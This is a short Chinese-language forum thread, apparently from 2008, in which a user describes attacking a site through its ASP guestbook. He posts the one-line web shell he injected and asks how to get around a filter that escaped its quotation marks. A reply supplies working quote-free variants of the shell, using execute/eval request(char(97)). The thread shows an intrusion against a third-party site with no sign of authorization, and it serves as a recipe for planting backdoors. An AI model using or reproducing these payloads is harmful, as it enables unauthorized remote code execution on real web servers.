返回列表 发帖

[讨论]关于一句话如果绕过网站的过滤限制

[讨论]关于一句话如果绕过网站的过滤限制
议题作者:kyo-esr

信息来源:邪恶八进制信息安全团队(www.eviloctal.com

今天碰到一个棘手的问题,日一个站日了半天愣是没有办法,都是静态页面,最后google了一下,竟然有asp的留言版~~
直接插入一句话,留完言后一看, <%execute request("value")%>给过滤成<%execute request("value")
[localimg=400,46]截图[/localimg]
晕,以前碰到的都是直接过滤了百分号的,这次过滤了引号,头一次遇到
"过滤成了"
改怎么改写一句话才能绕过?
thk
附件
1.jpg (78.8 KB)
2008-6-4 16:10
i am the bird...
帖子1 精华0 积分3 阅读权限40 性别男 来自none 在线时间3 小时 注册时间2006-8-26 最后登录2008-6-4 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

benben
晶莹剔透§烈日灼然

过滤引号是可以搞定的,你下!
帖子1 精华0 积分3 阅读权限40 在线时间0 小时 注册时间2005-6-17 最后登录2008-6-5 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

miao2
﹎'颓废小猫;

晶莹剔透§烈日灼然

TOP

<%execute request(char(97))%>
<%eval request(char(97))%>

帖子26 精华2 积分89 阅读权限40 性别男 在线时间102 小时 注册时间2007-7-28 最后登录2008-7-19 查看详细资料引用 报告 回复 TOP 软件项目外包

小胖子
Calm

晶莹剔透§烈日灼然

TOP

返回列表